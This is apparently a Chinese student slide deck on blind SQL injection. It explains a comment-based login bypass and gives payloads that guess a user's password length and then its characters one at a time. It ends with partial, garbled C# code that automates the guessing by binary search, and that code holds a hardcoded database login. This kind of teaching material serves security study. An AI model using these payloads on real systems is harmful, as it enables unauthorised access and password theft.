web安全BlindSQLInjection.pptVIP

IBM research ? 2003 IBM Corporation SRDS 2003 * SQL Blind Injection 小组成员：李昌华、肖箭、覃欢 2011-11-04 * 目录 * 一、SQL Blind Injection概述 二、常见的攻击方法 三、攻击步骤 四、程序 五、攻击演示 目录 当一个攻击者通过在查询语句中插入一系列的SQL语句来将数据写入到应用程序中,从一个数据库获得未经授权的访问和直接检索.通过构造一些畸形的输入，攻击者能够操作这种请求语句去获取预先未知的结果。  一、SQL Blind Injection 基本的句法的过程即通过标准的SELECT … WHERE语句，被注入的参数（即注入点）就是WHERE语句的一部分。为了确定正确的注入句法，攻击者必须能够在最初的WHERE语句后添加其他数据，使其能返回非预期的结果。对一些简单的应用程序，仅仅加上OR 1=1就可以完成，但在大多数情况下如果想构造出成功的利用代码，这样做当然是不够的。经常需要解决的问题是如何配对插入语符号（parenthesis，比如成对的括号），使之能与前面的已使用的符号，比如左括号匹配。 对于一些注入利用，仅仅改变WHERE语句就足够了，但对于其他情况，比如UNION SELECT注入或存储过程（stored procedures）注入，还需要能先顺利地结束整个SQL请求语句，然后才能添加其他攻击者所需要的SQL语句。在这种情况下，攻击者可以选择使用SQL注释符号来结束语句，该符号是两个连续的破折号（--），它要求SQL Server忽略其后同一行的所有输入。例如，一个登录页面需要访问者输入用户名和密码，并将其提交给SQL请求语句： SELECT Username, UserID, Password FROM Users WHERE Username = ‘user’ AND Password = ‘pass’ 通过输入john’--作为用户名，将会构造出以下WHERE语句：WHERE Username = ‘john’ --AND Password = ‘pass’ 这时，该语句不但符合SQL语法，而且还使用户跳过了密码认证 二、常见的攻击方法 确定注入点 构造正确的 注入语句 获得预期结果 三、攻击步骤 定位漏洞 非授权访问 实施攻击 四、程序 设计步骤 猜测账户名 原始查询语句（网页的源文件） string sqlSel = select count(*) from tb_userInfo where userName= + txtUserName.Text + and userPass=+pass+; 1.猜测账户名： 输入任意账户测试 如200808 密码非空随便输 验证码 猜测密码长度 2.猜测到手的账户对应的密码长度： 200808 and exists(select userName from tb_userInfo where len(userPass)6 and userName=200808)-- 密码非空随便输 验证码 逐位猜测密码 3.猜测到手的账户对应的密码（逐位的判断） 200808 and (select ASCII(SUBSTRING(userPass,1,1)) from tb_userInfo where userName=200808) 97 -- 四、步骤和SQL语句 二分法可以使得测试长度的结果收敛的更快 二分查找的代码 快速猜测 程序 protect int getPasswordLen(int MaxPassLen,int MinPasstLen) { //创建数据库连接 SqlConnection con = new SqlConnection(server=.;database=WebSecurityHomeWork;uid=sa;pwd=123;); //打开数据库连接 con.Open(); string basesql=200808 and exists(select userName from tb_userInfo where len(userPass); string endsql= and userName=200808)--; while() int currentLen=(MaxPassLen+MinPassLen)/2; string sqlSel=basesql+=+currentLen.toString()+endsql; //创建SqlCommand对象 SqlCommand com = new SqlCommand(sqlSel, c